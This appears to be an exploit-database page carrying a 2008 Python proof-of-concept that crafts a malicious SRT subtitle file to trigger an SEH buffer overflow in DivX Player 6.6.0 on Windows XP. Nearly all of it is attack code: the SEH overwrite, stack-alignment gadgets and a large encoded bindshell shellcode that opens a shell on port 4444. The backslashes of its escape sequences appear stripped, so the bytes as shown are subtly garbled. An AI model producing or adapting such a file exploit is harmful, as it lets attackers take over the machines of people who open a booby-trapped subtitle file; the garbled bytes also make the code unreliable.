DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit
# Published : 2008-04-18
# Author : muts
# Previous Title : MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021)
# Next Title : SCO UnixWare < 7.1.4 p534589 (pkgadd) Local Root Exploit
#!/usr/bin/python
#######################################################################
# DivX 6.6 SRT SEH overwrite PoC
# Tested on XP SP2
# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
# muts..at..offensive-security...dot..com
# chris..at..offensive-security...dot..com
# http://www.offensive-security.com/0day/divx66.py.txt
# Notes: Unicode buffer - real pita.
# Greetz to our wives - thanks for the couch!
#######################################################################
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:Documents and SettingsAdministratorDesktop>
#######################################################################
# file = name of avi video file
file="infidel.srt"                           

# Unicode friendly POP POP RET somewhere in DivX 6.6
# Note: x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods

ret="x94x48"

# Align stack for register save
nudge="x48x6d"

# Payload building blocks

buffer="x41" * 1032

xchg="x94x6d" # Swap back EAX, ESP for stack save,nop

pushad="x60x6d" # Save stack registers,nop

pushfd="x9cx6d" 

align_buffer="x05xFFx3Cx6Dx2Dxe1x3Cx6Dx2DxFFx10x6Dx05xFFx10x6D" # Point to end of buffer

align_eax="x2Dx2Fx10x6Dx05x10x10x6D" # Align EAX for popad/fd

popfd="x9Dx6D" # popfd,nop

popad="x61x6D"# popad,nop

padding="x70x70x70x70x70x70x70x70x70x70x70x70x70x70" # Crawl with remaining strength on bleeding knees to shellcode

rest= "x01" * 5000000 # Buffer and shellcode canvas 

# PoC Venetian Bindshell on port 4444 - ph33r
# Built on alternating 00 01 surface
# Venetian self decoding bindshell  - 1580 bytes

bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
"x80xFBx6Dx40x6Dx80x6Ax6Dx40x6Dx80xEAx6Dx40x6Dx80"
"x4Dx6Dx40x6Dx80xE7x6Dx40x6Dx80xF9x6Dx40x6Dx80xFE"
"x6Dx40x6Dx80xFFx6Dx40x6Dx80xFEx6Dx40x6Dx80x60x6D"
"x40x6Dx80x8Ax6Dx40x6Dx80x6Cx6Dx40x6Dx80x23x6Dx40"
"x6Dx80x24x6Dx40x6Dx80x8Ax6Dx40x6Dx80x45x6Dx40x6D"
"x80x3Bx6Dx40x6Dx80x8Bx6Dx40x6Dx80x7Bx6Dx40x6Dx80"
"x05x6Dx40x6Dx80x77x6Dx40x6Dx80x01x6Dx40x6Dx80xEE"
"x6Dx40x6Dx80x8Bx6Dx40x6Dx80x4Ex6Dx40x6Dx80x18x6D"
"x40x6Dx80x8Ax6Dx40x6Dx80x5Fx6Dx40x6Dx80x1Fx6Dx40"
"x6Dx80x01x6Dx40x6Dx80xEAx6Dx40x6Dx80x49x6Dx40x6D"
"x80x8Ax6Dx40x6Dx80x34x6Dx40x6Dx80x8Ax6Dx40x6Dx80"
"x01x6Dx40x6Dx80xEDx6Dx40x6Dx80x31x6Dx40x6Dx80xBF"
"x6Dx40x6Dx80x99x6Dx40x6Dx80xABx6Dx40x6Dx80x84x6D"
"x40x6Dx80xBFx6Dx40x6D"
"x80x74x6Dx40x6Dx80x06x6Dx40x6Dx80xC1x6Dx40x6Dx80"
"xC9x6Dx40x6Dx80xEFx6Dx80x1Ex6Dx40x6Dx40x6Dx80xC2"
"x6Dx40x6Dx80xEAx6Dx40x6Dx80xF4x6Dx40x6Dx80x3Ax6D"
"x40x6Dx80x54x6Dx40x6Dx80x23x6Dx40x6Dx80x28x6Dx40"
"x6Dx80x74x6Dx40x6Dx80xE5x6Dx40x6Dx80x8Ax6Dx40x6D"
"x80x5Fx6Dx40x6Dx80x23x6Dx40x6Dx80x01x6Dx40x6Dx80"
"xEAx6Dx40x6Dx80x66x6Dx40x6Dx80x8Ax6Dx40x6Dx80x0C"
"x6Dx40x6Dx80x4Ax6Dx40x6Dx80x8Bx6Dx40x6Dx80x5Ex6D"
"x40x6Dx80x1Cx6Dx40x6Dx40x6Dx80xEBx6Dx40x6Dx80x02"
"x6Dx40x6Dx80x2Cx6Dx40x6Dx80x8Ax6Dx40x6Dx80x89x6D"
"x40x6Dx80x6Bx6Dx40x6Dx80x24x6Dx40x6Dx80x1Bx6Dx40"
"x6Dx80x61x6Dx40x6Dx80xC2x6Dx40x6Dx80x31x6Dx40x6D"
"x80xDAx6Dx40x6Dx80x64x6Dx40x6Dx80x8Ax6Dx40x6Dx80"
"x43x6Dx40x6Dx80x2Fx6Dx40x6Dx80x8Bx6Dx40x6Dx80x3F"
"x6Dx40x6Dx80x0Cx6Dx40x6Dx80x8Ax6Dx40x6Dx80x70x6D"
"x40x6Dx80x1Bx6Dx40x6Dx80xADx6Dx40x6Dx80x8Ax6Dx40"
"x6Dx80x40x6Dx40x6Dx80x07x6Dx40x6Dx80x5Ex6Dx40x6D"
"x80x67x6Dx40x6Dx80x8Ex6Dx40x6Dx80x4Dx6Dx40x6Dx80"
"x0Ex6Dx40x6Dx80xEBx6Dx40x6Dx80x50x6Dx40x6Dx80xFE"
"x6Dx40x6Dx80xD6x6Dx40x6Dx80x65x6Dx40x6Dx80x53x6D"
"x40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6Dx80x32x6Dx40"
"x6Dx80x32x6Dx40x6Dx80x67x6Dx40x6Dx80x77x6Dx40x6D"
"x80x72x6Dx40x6Dx80x32x6Dx40x6Dx80x5Ex6Dx40x6Dx80"
"x54x6Dx40x6Dx80xFEx6Dx40x6Dx80xD0x6Dx40x6Dx80x67"
"x6Dx40x6Dx80xCBx6Dx40x6Dx80xECx6Dx40x6Dx80xFCx6D"
"x40x6Dx80x3Ax6Dx40x6Dx80x50x6Dx40x6Dx80xFEx6Dx40"
"x6Dx80xD6x6Dx40x6Dx80x5Ex6Dx40x6Dx80x89x6Dx40x6D"
"x80xE4x6Dx40x6Dx80x66x6Dx40x6Dx80x80x6Dx40x6Dx80"
"xEDx6Dx40x6Dx80x07x6Dx40x6Dx80x02x6Dx40x6Dx80x54"
"x6Dx40x6Dx80x6Ax6Dx40x6Dx80x01x6Dx40x6Dx80xFFx6D"
"x40x6Dx80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xD8x6Dx40"
"x6Dx80x09x6Dx40x6Dx80xF4x6Dx40x6Dx80xADx6Dx40x6D"
"x80x56x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80"
"x53x6Dx40x6Dx80x52x6Dx40x6Dx80x53x6Dx40x6Dx80x52"
"x6Dx40x6Dx80x53x6Dx40x6Dx80x42x6Dx40x6Dx80x53x6D"
"x40x6Dx80x42x6Dx40x6Dx80x53x6Dx40x6Dx80xFEx6Dx40"
"x6Dx80xD0x6Dx40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6D"
"x80x10x6Dx40x6Dx80x5Cx6Dx40x6Dx80x65x6Dx40x6Dx80"
"x53x6Dx40x6Dx80x88x6Dx40x6Dx80xE1x6Dx40x6Dx80x94"
"x6Dx40x6Dx80x68x6Dx40x6Dx80xA3x6Dx40x6Dx80x1Ax6D"
"x40x6Dx80x6Fx6Dx40x6Dx80xC7x6Dx40x6Dx80x56x6Dx40"
"x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80x6Ax6Dx40x6D"
"x80x0Fx6Dx40x6Dx80x51x6Dx40x6Dx80x54x6Dx40x6Dx80"
"xFFx6Dx40x6Dx80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xA3"
"x6Dx40x6Dx80xADx6Dx40x6Dx80x2Dx6Dx40x6Dx80xE9x6D"
"x40x6Dx80x56x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40"
"x6Dx80x53x6Dx40x6Dx80x54x6Dx40x6Dx80xFFx6Dx40x6D"
"x80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xE4x6Dx40x6Dx80"
"x49x6Dx40x6Dx80x85x6Dx40x6Dx80x49x6Dx40x6Dx80x56"
"x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80x50x6D"
"x40x6Dx80x53x6Dx40x6Dx80x54x6Dx40x6Dx80x54x6Dx40"
"x6Dx80xFFx6Dx40x6Dx80xCFx6Dx40x6Dx80x93x6Dx40x6D"
"x80x67x6Dx40x6Dx80xE7x6Dx40x6Dx80x78x6Dx40x6Dx80"
"xC6x6Dx40x6Dx80x78x6Dx40x6Dx80x57x6Dx40x6Dx80xFE"
"x6Dx40x6Dx80xD6x6Dx40x6Dx80x54x6Dx40x6Dx80xFFx6D"
"x40x6Dx80xCFx6Dx40x6Dx80x66x6Dx40x6Dx80x69x6Dx40"
"x6Dx80x64x6Dx40x6Dx80x65x6Dx40x6Dx80x68x6Dx40x6D"
"x80x62x6Dx40x6Dx80x6Dx6Dx40x6Dx80x88x6Dx40x6Dx80"
"xE5x6Dx40x6Dx80x69x6Dx40x6Dx80x50x6Dx40x6Dx80x58"
"x6Dx40x6Dx80x29x6Dx40x6Dx80xCBx6Dx40x6Dx80x89x6D"
"x40x6Dx80xE6x6Dx40x6Dx80x6Ax6Dx40x6Dx80x43x6Dx40"
"x6Dx80x89x6Dx40x6Dx80xE1x6Dx40x6Dx80x31x6Dx40x6D"
"x80xBFx6Dx40x6Dx80xF3x6Dx40x6Dx80xA9x6Dx40x6Dx80"
"xFEx6Dx40x6Dx80x41x6Dx40x6Dx80x2Dx6Dx40x6Dx80xFD"
"x6Dx40x6Dx80x42x6Dx40x6Dx80x2Bx6Dx40x6Dx80x93x6D"
"x40x6Dx80x8Cx6Dx40x6Dx80x7Ax6Dx40x6Dx80x37x6Dx40"
"x6Dx80xABx6Dx40x6Dx80xAAx6Dx40x6Dx80xABx6Dx40x6D"
"x80x67x6Dx40x6Dx80x72x6Dx40x6Dx80xFDx6Dx40x6Dx80"
"xB3x6Dx40x6Dx80x15x6Dx40x6Dx80xFFx6Dx40x6Dx80x74"
"x6Dx40x6Dx80x44x6Dx40x6Dx80xFEx6Dx40x6Dx80xD6x6D"
"x40x6Dx80x5Ax6Dx40x6Dx80x57x6Dx40x6Dx80x51x6Dx40"
"x6Dx80x51x6Dx40x6Dx80x50x6Dx40x6Dx80x51x6Dx40x6D"
"x80x69x6Dx40x6Dx80x01x6Dx40x6Dx80x50x6Dx40x6Dx80"
"x51x6Dx40x6Dx80x54x6Dx40x6Dx80x51x6Dx40x6Dx80xFE"
"x6Dx40x6Dx80xD0x6Dx40x6Dx80x67x6Dx40x6Dx80xADx6D"
"x40x6Dx80xD8x6Dx40x6Dx80x05x6Dx40x6Dx80xCDx6Dx40"
"x6Dx80x53x6Dx40x6Dx80xFEx6Dx40x6Dx80xD6x6Dx40x6D"
"x80x69x6Dx40x6Dx80xFFx6Dx40x6Dx80xFEx6Dx40x6Dx80"
"x37x6Dx40x6Dx80xFEx6Dx40x6Dx80xD0x6Dx40x6Dx80x8A"
"x6Dx40x6Dx80x57x6Dx40x6Dx80xFBx6Dx40x6Dx80x83x6D"
"x40x6Dx80xC3x6Dx40x6Dx80x64x6Dx40x6Dx80xFEx6Dx40"
"x6Dx80xD6x6Dx40x6Dx80x51x6Dx40x6Dx80xFFx6Dx40x6D"
"x80xCFx6Dx40x6Dx80x68x6Dx40x6Dx80xEEx6Dx40x6Dx80"
"xCEx6Dx40x6Dx80xDFx6Dx40x6Dx80x60x6Dx40x6Dx80x52"
"x6Dx40x6Dx80xFFx6Dx40x6Dx80xD5x6Dx40x6Dx80xFFx6D"
"x40x6Dx80xCFx6D" + nudge * 60 + align_eax + xchg +popfd +popad +padding + rest)

f=open(file,'w')
f.write("1 n")
f.write("00:00:01,001 --> 00:00:02,001n")
f.write(bindshell)
f.close()                                              
print "DivX 6.6 SEH SRT Overflow - PoCn";    
print "http://www.offensive-security.com/0day/divx66.py.txtn";    
print "SRT has been created - ph33r n";    

# www.Syue.com [2008-04-18]